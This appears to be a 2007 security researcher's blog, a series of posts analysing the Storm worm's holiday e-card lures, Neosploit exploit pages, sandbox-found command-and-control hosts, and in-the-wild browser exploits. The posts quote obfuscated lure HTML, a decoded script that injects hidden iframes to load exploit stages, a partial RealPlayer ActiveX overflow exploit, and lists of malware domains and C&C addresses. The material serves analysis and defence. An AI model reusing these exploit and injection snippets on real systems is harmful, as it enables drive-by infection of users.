Friday, December 28, 2007

New Year, Recycled Greeting Cards

The Storm authors have made up for their lack of creativity by registering a bunch of domains and quickly rotating the filename. Additionally, a decoy filename has been added as a comment in the HTML source:
Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );
The unescaped JavaScript actually writes out:
<a href="happynewyear2008.exe">
This was probably done in an attempt to identify automated scripts that parse the page for links and then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):
newyearcards2008.com
happycards2008.com
uhavepostcard.com
merrychristmasdude.com
newyearwithlove.com
familypostcards2008.com
freshcards2008.com
hellosanta2008.com
happy2008toyou.com
happysantacards.com
hohoho2008.com

serving the following files:
happynewyear2008.exe
happy_2008.exe
sony.exe


Wednesday, December 26, 2007

Bleeding Edge threats mirror

For the last few days Bleeding Edge Threats (Sensory Networks) has had issues with their DNS and servers. Matt Jonkman let us know that his new home, Emerging Threats, will also act as a mirror for the Bleeding Edge rules. An entry on the Emerging Threats website states:

In light of the unavailability of the Bleeding Edge Rulesets we're mirroring them over here. Will be adding a number of rules as well in the next few days. Rules will be available at the same url pattern, just use the domain emergingthreats.net. View directly here: http://www.emergingthreats.net/rules/

The primary site Bleedingthreats.com has been plagued by DNS instability and site outages. It's currently been down for days with no response from its maintainers. Not an acceptable situation for a realtime ruleset.

We will be pushing updates to the rulesets from here, and setting up a backend to manage these rules and the new rules we'll be adding. Please feel free to send rules here or to the bleeding edge folks.

As you can see we're just getting this site online. We haven't even picked up a logo yet, or a permanent color scheme. If you want to contribute a logo, please do! All of the current efforts are going into an intelligence gathering and rule generating backend. Great progress has been made, a very interesting data stream is coming online very soon!

Our intention is not to split the ruleset, maintaining these rules is not an easy task nor does it produce revenue. We'd be just as happy had they been maintained in their original home at Bleeding Threats and the research beginning here could have contributed into that ruleset. But that's unfortunately not happening, so we'll keep them here. Bleeding Threats will likely continue to maintain a ruleset, you should stick to one set or the other.

Please send any questions to myself directly at [e-mail address not preserved]. We'll be putting up some mailing lists to hop onto shortly. You can track the news and developments via the RSS feeds available on the site left bar. Administrators will be available in the Freenode IRC room #emergingthreats, and soon in an open Jabber room.



Bah, Storm.

I'd like to thank everyone who wrote in with the updates: CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of non-digital happiness, and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious afterthought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text-only front page:
Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!
Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded JavaScript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second-rate script rats should think twice before getting in bed with these goons: they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Year's wish, I'd like a picture of the CME711 weenies drinking well-expired eggnog. I'd also settle for another wonderful day with the family, as it was today.


Monday, December 24, 2007

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!


We just received a handful of these in our mail drops. Looks like the Grinch still runs Storm.
Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (see previous post) has no issues with this JavaScript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);


So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...
function startANI() {
// Inject a 1x1 iframe that requests the next stage from the same in.cgi script
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = '<iframe src="?o2&p=595022058&r=2792316769" height="1" width="1">';
return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);
...snip...

The ANI looks fun:
From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]


Once run in the sandbox, %windir%/disnisa.exe is the dropped binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)


Saturday, December 22, 2007

The silent Storm and Javascript Decoding

It's been a while since I've posted anything. I haven't lost touch; I've just been busy with the upcoming holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet in favor of laying low for a few months and releasing a whole new version of the code, one with fewer bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid-November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write-up here. In fact, Daniel sparked my interest in decoding malicious JavaScript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic JavaScript decoder, which you can freely download and use. It is coded with an eye towards the Unix flavor of OS, but should work fine if you have SpiderMonkey installed for Windows and don't mind modifying the code slightly. Jsdecode is a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most malicious JavaScript can be decoded by simply running it through this script. So far I've only had a handful of malicious scripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, modifies eval statements so they print to the screen, and reruns the decoded JavaScript to make sure it's not just double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)


Thursday, December 06, 2007

Sandboxing and CSA Advisory

I spent a few hours playing with my sandbox tonight, and found these C&Cs:

x.fuckunion.com (GET /adswin//adsupdate.asp?ver=2007010300 HTTP/1.1)

http://208.72.169.22:4099 (GET /g/A39F4B-796773-3A00DD HTTP/1.1)

traff.justcount.net GET /t/d2hsdWF3OzJ0OHY5Oj0................cKEwkcVA8KCwEL/count.htm HTTP/1.1

208.72.169.55 (POST /login.php HTTP/1.0)

s2.truth-is-out-there.org (GET /?name= HTTP/1.1) -> f6.thezirius.com (GET /?feed=1&name= HTTP/1.1)

barragames1.sslpowered.com (POST /jogador/infe.php HTTP/1.0)

www.samedi.org (POST /syls/SAICOX.cgi HTTP/1.1)

IRC: Undernet.org:6665, Chan: #sefutemata69 Chankey: disc


----

Earlier this afternoon Cisco released an advisory about their Security Agent (CSA). At this time there is no public exploit; however, I am sure that will change over the next few days.

It appears that CSA is vulnerable to specially crafted overflows on the SMB ports (139/445). The advisories reference BSODs and possible code execution. It's never good when a security application comes up on the CVE list. Be sure you update your CSA as soon as possible.


Wednesday, December 05, 2007

QuickTime and RealPlayer Exploits

We're seeing lots of reports about QuickTime and RealPlayer exploits in the wild. Other security vendors are privately reporting in excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded JavaScript. Of course, users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....

(removed some content)
.....
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade their third-party applications. Please remember to apply all security patches for those as frequently as (or more often than) Windows updates.

In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!
